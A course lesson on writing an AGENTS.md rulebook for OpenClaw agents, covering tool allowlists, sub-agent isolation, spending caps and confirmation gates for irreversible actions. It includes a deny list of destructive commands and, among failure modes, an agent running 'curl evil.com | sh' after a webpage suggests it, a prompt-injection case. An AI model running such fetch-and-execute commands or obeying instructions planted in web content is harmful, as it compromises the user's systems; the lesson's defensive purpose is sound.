AGENTS.md, Day 9 of the Free Comprehensive OpenClaw Course
The Operating Manual
Why this matters
OpenClaw agents.md is the rulebook the runtime enforces, not just a doc the model reads. Once your agent has a voice and a memory, the next risk is that it does something destructive on autopilot. This lesson walks the operating rules, safety defaults, sub-agent delegation, and the three security mechanisms that make autonomy actually safe to deploy unattended.
How do I write a safe AGENTS.md file?
OpenClaw agents.md is the rulebook the runtime enforces, not just a doc the model reads. Once your agent has a voice (SOUL.md) and a memory (MEMORY.md), the next risk is autopilot. The agent is a process, it runs on a heartbeat, it has tools, and without a real rulebook it will eventually do something you did not want it to do, possibly destructively.
The minimum viable AGENTS.md has four sections:
- Tool gates. Which tools the agent is allowed to call, in plain words, and which require human confirmation before invoking.
- Sub-agent policies. Whether sub-agents are allowed, what they inherit, what they cannot do.
- Spending caps. Per-day and per-week token spend ceilings the runtime enforces.
- Irreversible-action rules. Anything destructive (delete files, send emails, push commits) requires explicit confirmation, even from the user.
Write the file in plain English, not JSON. The runtime parses the intent. Specific rules beat general principles, "the agent must not run rm without explicit confirmation" beats "the agent should be careful with destructive commands".
Example AGENTS.md sections, with full syntax
A real AGENTS.md for a personal assistant agent that has email, calendar, file write, and shell access:
# AGENTS.md
## Tool gates
### Always allowed (no confirmation)
- read: any file under ~/agent-workspace
- fetch: any URL on the GET allowlist below
- calendar.read: full read access to my calendar
### Confirmation required (agent asks before)
- write: any file outside ~/agent-workspace
- email.send: any outbound email
- calendar.create: new events with attendees other than me
- exec: any shell command not on the safe-list
### Never allowed
- exec: rm, sudo, dd, mkfs, anything in /etc
- write: anywhere under /etc, /var, /System, /usr
## Fetch allowlist (GET only, no auth headers)
- https://api.openweathermap.org/*
- https://api.github.com/repos/myname/*
- https://hooks.slack.com/services/*
## Spending caps
- daily_token_spend_usd: 5
- weekly_token_spend_usd: 25
- on_cap_breach: pause non-essential heartbeat, alert user
## Sub-agents
- max_concurrent: 3
- inherits_memory: false
- inherits_tools: false (sub-agent declares its own grants)
## Irreversible actions
Always require explicit user confirmation for:
- Sending email, posting to public Slack channels, posting tweets
- git push, git rebase, git reset --hard
- Stripe charge, refund, subscription change
- Any DELETE HTTP request
- File deletion outside ~/agent-workspace
Roughly 40 lines, plain English, the runtime parses each section. This is the contract that lets you leave the agent running unattended without paranoia.
What are the OpenClaw security mechanisms?
Three core mechanisms make autonomy actually safe.
Tool gates. The agent only has access to the tools listed in TOOLS.md and approved in AGENTS.md. By default, exec, write, and any tool that can mutate the outside world are off. You explicitly turn them on with the level of confirmation each requires.
Sub-agent isolation. A sub-agent spawned by the main agent gets its own memory, its own tool grants, and its own scoped channel. A compromised sub-agent cannot read the parent's MEMORY.md, cannot grant itself new tools, and cannot reach back into the parent's channels.
Irreversible-action gates. Anything labeled "irreversible" in AGENTS.md requires explicit confirmation. Sending an email, deleting a file, pushing to git, transferring money. The agent stops and asks before doing it. This is the gate that catches "I asked for a draft, the agent shipped".
None of these are perfect, prompt injection from a hostile email or webpage is still a real risk, see openclaw prompt injection for the threat model. But these three together are the difference between an agent that occasionally does something dumb and one that occasionally does something destructive.
The three mechanisms in code
The tool-gate check happens in the runtime before any tool call:
// Pseudo-code from the runtime
function canCallTool(tool, args, agent) {
const grant = agent.agentsMd.toolGates[tool.name];
if (!grant) return { allowed: false, reason: "tool not granted" };
if (grant.matches(args)) return { allowed: true };
if (grant.requiresConfirmation) {
return { allowed: "ask_user", reason: "confirmation required" };
}
return { allowed: false, reason: "args not in allowlist" };
}
The sub-agent isolation check happens at spawn time, the parent passes a scoped manifest, the runtime enforces it cannot be widened:
const subAgent = await runtime.spawnSubAgent({
parent: mainAgent,
manifest: {
tools: ['read', 'fetch'], // explicit narrow grant
memory: 'isolated', // no parent MEMORY.md
channels: ['internal-' + id], // only this scoped channel
timeout_seconds: 300,
},
});
The irreversible-action gate is just a list of patterns matched before tool calls fire. If the call matches any pattern in the irreversible section of AGENTS.md, the runtime pauses and surfaces a confirmation prompt to the user's primary channel.
When should I split work into sub-agents?
Sub-agents are useful when the work the agent is doing has a different shape than the agent's main personality. A planner agent that needs read-only access to your codebase is a sub-agent. A research agent that needs web access but should not have write access to your filesystem is a sub-agent. A code-running agent that should be sandboxed away from your real shell is a sub-agent.
The rule of thumb: if the work needs different tool grants than the parent, that is a sub-agent. If the work needs different memory than the parent, that is a sub-agent. If the work just needs more context, that is not a sub-agent, that is a longer prompt.
The sub-agent pattern is also how you safely run untrusted Skills. Day 10, openclaw skills covers Skill installation, the safe pattern is to install a third-party Skill into a sub-agent with minimal tool grants, not into the main agent.
Sub-agent delegation patterns that work
Three delegation patterns that have shipped in client agents. Planner-executor split. The main agent decides what needs to be done, spawns a planner sub-agent with read-only access to gather context and produce a plan, then spawns an executor sub-agent with write access scoped to the relevant files. The planner cannot write, the executor cannot read anything outside its scope, the parent reviews the plan before authorizing execution. This is the pattern from openclaw agentic coding on day 14.
The second, research delegation. The main agent gets a question that needs web research. It spawns a research sub-agent with browser and fetch access, no other tools, a 10-minute timeout, and a scoped channel for returning results. The sub-agent returns a structured summary, the parent integrates the summary into the user-facing reply. The parent never has to grant itself browser access.
The third, untrusted-skill quarantine. A new third-party Skill from ClawHub gets installed into a sub-agent that exists for the sole purpose of running this one Skill. The sub-agent has only the tools the Skill manifest declares, no MEMORY.md, no other Skills. If the Skill is malicious, the blast radius is the sub-agent's narrow tool grants and its single conversation. The parent agent stays clean.
Allowlist, never blocklist
One core principle that catches the most production mistakes: allowlist tools and capabilities, do not blocklist them. The failure mode of a blocklist is silent and wrong direction, you forget to add a new dangerous tool to the blocklist and the agent uses it. The failure mode of an allowlist is loud and safe, the agent tries to do something not on the list, the runtime refuses, and you find out about it.
This applies to channels (allowlist usernames), to tools (allowlist exec commands), to network destinations (allowlist URLs the agent can fetch). Always allowlist. The friction of having to add a new entry when you want a new capability is a feature, it forces you to think about the security shape of the change.
Common AGENTS.md mistakes that cost real money
Three real failure modes I have seen in client deployments. The first, tool grants too broad. The agent gets a generic "exec: allowed" line in AGENTS.md, and the model then reasons its way into running curl evil.com | sh because some webpage suggested it. The fix is allowlist specific commands: exec: ls, cat, grep, head, tail, wc. Anything destructive requires confirmation. Anything network-touching requires the fetch tool with its own allowlist instead.
The second, spending caps not enforced. The cap is in AGENTS.md but the runtime version on the host is older than 2026.4 and does not actually enforce them. Confirm with openclaw --version and check the changelog. Older versions read the cap but do not block on it, the cap is decorative until the runtime is upgraded.
The third, irreversible-action list missing modern threats. The list says "no rm without confirmation" but does not mention "no Stripe charges", "no DNS changes", "no AWS S3 deletes". Every new integration adds new irreversible actions, the list needs to grow with the agent. Audit the list every time you add a Skill, every time you connect a new integration.
When AGENTS.md changes take effect
Most workspace files hot-reload, AGENTS.md is one of the few that does not. Tool grants and security policies require a runtime restart to apply. The reason is the runtime caches the parsed grant tree at boot for performance, hot-reloading the cache while the agent is mid-prompt can produce a window where a tool call is mistakenly authorized.
The operational pattern: edit AGENTS.md, commit the change, restart the agent with docker compose restart openclaw or your equivalent. The restart is fast (5 to 15 seconds), the agent picks up the new policy on next prompt. Same for adding a new Skill, removing a tool, changing the spending cap.
The exception is the spending cap counters themselves, which do hot-update. The runtime tracks accumulated spend in memory plus a sidecar file, and editing the cap value changes the threshold for the in-flight counter immediately. So you can drop the daily cap from $5 to $2 without restarting if you want to throttle a misbehaving agent in real time.
How this connects to your full agent
AGENTS.md is the file that makes the rest of the agent safe to run unattended. Without it, the heartbeat from openclaw heartbeat.md can fire destructive tool calls without confirmation. Without it, a Skill from openclaw skills can grant itself access to anything it wants. Without it, the docker sandbox from openclaw docker on day 12 is the only thing standing between a confused agent and your real systems.
Get AGENTS.md right before you wire any of the days 10 to 16 features. The cost of going back and adding gates after a Skill or sub-agent has already been running for a week is much higher than wiring the gates first. The full security audit checklist lives in openclaw workspace files on day 16, run it before any production deploy.
Key takeaways
- 01AGENTS.md is the only file that gates which tools the agent is allowed to call.
- 02Sub-agent delegation lets a planner agent farm work to specialists without sharing all permissions.
- 03Allowlist destructive tools by default, never blocklist, the failure mode is wrong direction.
- 04The three core security mechanisms are tool gates, sub-agent isolation, and irreversible-action gates.
About the instructor. Adhiraj Hangal teaches this lesson. Founder of OpenClaw Consult and one of the few consultants whose code is merged in openclaw/openclaw core. PR #76345 was reviewed and merged by project creator Peter Steinberger. Read the contribution log.
Need help shipping openclaw agents.md in production?
OpenClaw Consult ships production-grade OpenClaw deployments for operators and founders. Founded by Adhiraj Hangal, a merged contributor to openclaw/openclaw core.
Hire an OpenClaw expert→